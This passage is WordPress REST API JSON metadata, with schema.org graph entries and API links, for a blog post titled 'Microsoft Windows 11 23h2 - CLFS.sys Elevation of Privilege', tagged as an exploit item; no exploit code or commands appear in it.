Privilege","datePublished":"2025-04-23T05:59:41+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=931"},"wordCount":700,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-7.8","exploit","exploitdb","HIGH","news","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=931#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=931","url":"https:\/\/zero.redgem.net\/?p=931","name":"Microsoft Windows 11 23h2 - CLFS.sys Elevation of Privilege - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-04-23T05:59:41+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=931#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=931"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=931#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"Microsoft Windows 11 23h2 – CLFS.sys Elevation of Privilege"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/931","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=931"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/931\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=931"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=931"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=931"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}